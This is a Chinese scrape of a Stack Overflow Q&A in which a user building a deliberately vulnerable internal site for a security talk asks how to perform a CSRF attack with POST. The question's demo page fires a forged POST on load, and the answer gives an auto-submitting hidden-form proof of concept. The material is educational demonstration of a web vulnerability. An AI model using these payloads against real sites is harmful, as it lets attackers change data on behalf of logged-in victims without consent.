gpt4 book ai didi

security - 如何演示CSRF攻击

转载 作者:行者123 更新时间:2023-12-03 13:55:23 25 4
gpt4 key购买 nike

我正在向企业中的其他一些人介绍Web安全,并且我想展示一些具有更大影响力的示例。

为此,我创建了一个容易受到这种攻击的小型网站,该网站只能在我们的网络上访问。

我现在正在尝试利用这种攻击,但是我有一个问题:

如何使用POST表单执行此操作?

我使用GET查询进行此操作没有问题,但是使用POST,我正在尝试使用javascript进行此操作,如果我将代码托管在同一主机上也没问题,但是如果我想将代码托管到另一台主机上更为现实的是,我被屏蔽了,因为它是跨域请求。

那么我应该如何发送这些POST变量?

谢谢!

这是我当前的代码:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>CSRF attack demo</title>
<script type="text/javascript">
function getHTTPObject() {
var http = false;
//Use IE's ActiveX items to load the file.
if(typeof ActiveXObject != 'undefined') {
try {http = new ActiveXObject("Msxml2.XMLHTTP");}
catch (e) {
try {http = new ActiveXObject("Microsoft.XMLHTTP");}
catch (E) {http = false;}
}
//If ActiveX is not available, use the XMLHttpRequest of Firefox/Mozilla etc. to load the document.
} else if (window.XMLHttpRequest) {
try {http = new XMLHttpRequest();}
catch (e) {http = false;}
}
return http;
}
function post_to_url(path, params, method) {
method = method || "post"; // Set method to post by default, if not specified.

// The rest of this code assumes you are not using a library.
// It can be made less wordy if you use one.
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);

for(var key in params) {
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", key);
hiddenField.setAttribute("value", params[key]);

form.appendChild(hiddenField);
}

document.body.appendChild(form);
form.submit();
}

function postToUrlBackground(path, params){
var http = getHTTPObject();

http.open("POST", path, true);

//Send the proper header information along with the request
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-length", params.length);
http.setRequestHeader("Connection", "close");

http.onreadystatechange = function() {//Call a function when the state changes.
if(http.readyState == 4 && http.status == 200) {
//alert("Response received");
}
}
http.send(params);
}
function TryAttack(){
//alert("Sending");
postToUrlBackground("http://localhost:51612/Movie/Edit/1", "Title=%28500%29This+item+has+been+changed+without+any+rights&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE");
//postToUrlBackground("http://localhost:51612/Movie/Edit/1","Title=%28500%29+JOURS+ENSEMBLE&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE" );
//alert("sent");
}
</script>
</head>
<body onload="TryAttack()">
<img src=image.png />
</body>
</html>

最佳答案

在“其他主机”(攻击者)上,您只需使用方法FORM创建一个POST,其方法action(即提交表单的位置)就是您的易受攻击的应用程序。然后在该页面上使用javascript提交。

像这样:

<html><body>
<form name="csrf_form" action="http://VULNERABLE_APP/csrf.php" method="POST">
<input type="hidden" name="csrf_param" value="POST_ATTACK">
</form>

<script type="text/javascript">document.csrf_form.submit();</script>
</body></html>


当您打开该页面时,这将从攻击者的主机向您的易受攻击的应用程序提交 POST

关于security - 如何演示CSRF攻击,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/6812765/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com